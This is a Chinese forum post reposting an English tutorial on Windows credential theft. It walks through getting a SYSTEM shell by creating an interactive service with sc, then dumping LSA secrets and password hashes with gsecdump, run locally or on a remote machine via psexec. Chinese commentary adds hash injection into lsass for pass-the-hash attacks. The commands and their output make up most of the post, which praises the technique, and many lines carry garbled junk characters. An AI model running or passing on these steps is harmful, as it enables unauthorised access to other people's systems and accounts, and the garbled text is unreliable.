HASH注入式攻击

admin

o get a DOS Prompt as NT system:
; U# N) c8 A  w, r* C" s) w& }
' F1 b( u/ ?0 {+ ^- d5 v. M' G; UC:\>sc create shellcmdline binpath= "C:\WINDOWS\system32\cmd.exe /K start" type= own type= interact
/ @6 o" v: j0 `9 g[SC] CreateService SUCCESS

C:\>sc start shellcmdline
& o* c: m3 v1 E2 I2 o( [[SC] StartService FAILED 1053:
0 S1 X8 e6 |5 l4 _! C, j
3 a2 S6 N6 j) F6 Z7 n* _  L+ ]The service did not respond to the start or control request in a timely fashion.

/ w" O( i) e4 Q" O% [, e6 dC:\>sc delete shellcmdline
[SC] DeleteService SUCCESS

6 @. B+ q3 c0 l6 _( e1 f------------

5 o) Z! F4 s. O) r2 XThen in the new DOS window:
  t# H, d: y: F# s9 V0 F4 U: o' s
4 N7 m  X/ R. V1 A3 pMicrosoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>whoami
' |! d( j7 G* h7 w# P' xNT AUTHORITY\SYSTEM

( @' h5 A3 j* Y# f  A  D, gC:\WINDOWS\system32>gsecdump -h
gsecdump v0.6 by Johannes Gumbel (链接标记johannes.gumbel@truesec.se)
1 O; e1 f" C/ ^7 y. y! Ausage: gsecdump [options]

/ k, b6 b) |4 ?( _) Aoptions:
7 ~2 A- M" A  u  C-h [ --help ] show help
* l2 F  u+ Y' N& m-a [ --dump_all ] dump all secrets
( V9 k& T; Z  ~* m2 j' Y4 s! W: I/ J-l [ --dump_lsa ] dump lsa secrets
: b9 V' [) }6 T0 G-w [ --dump_wireless ] dump microsoft wireless connections
-u [ --dump_usedhashes ] dump hashes from active logon sessions
: G; C6 R; `( N5 Y' B-s [ --dump_hashes ] dump hashes from SAM/AD
% S$ z! q, R, V8 F5 o- i/ k
) s0 A7 ~" a7 i- d' L. f$ g; wAlthough I like to use:
; Y) b! T* ?* s4 v! j+ n, A
, V/ Q& I5 a5 A$ _. N1 l7 ?PsExec v1.83 - Execute processes remotely
2 Y$ v# Z" o3 ~4 `9 @Copyright (C) 2001-2007 Mark Russinovich
  ?2 ~. I( x8 ^! gSysinternals - 链接标记[url]www.sysinternals.com[/url]

C:\>psexec \\COMPUTER -u user -p password -s -f -c gsecdump.exe -u >Active-HASH.TXT
) ^$ y' J" |9 e4 n+ k) _. t3 k; v
+ c/ `7 R) C' N' R$ X/ F- ^to get the hashes from active logon sessions of a remote system.
+ \; H" X& Y: |; R7 R4 k
These are a lot better than getting a cachedump of the Cached Credentials because these hashes are LMHashes that can be easily broken with Rainbow Tables.

提示一下,可以使用pshtools工具包中的iam,把刚才使用gsecdump抓取出来HASH信息导入本地的lsass进程,来实现hash注入式攻击,还是老外厉害,这下管理员有得忙了,ARP欺骗的时候获得的LM/NThash,还有gethash获得的,其实根本不用破解密码,这个就是利用工具了,原文说的好,不管密码是设置4位还是127位,只要有了hash,100%就能搞定了.
( U; Q. T3 Z/ Y! D2 y& V$ T原文出处:链接标记[url]http://truesecurity.se/blogs/mur ... -text-password.aspx[/url]
6 e" w! y* ?0 y1 o3 f( q
& S6 w8 `, v' V; P7 I我看了下原文出处，貌似是/2007/03/16/郁闷啊，差距。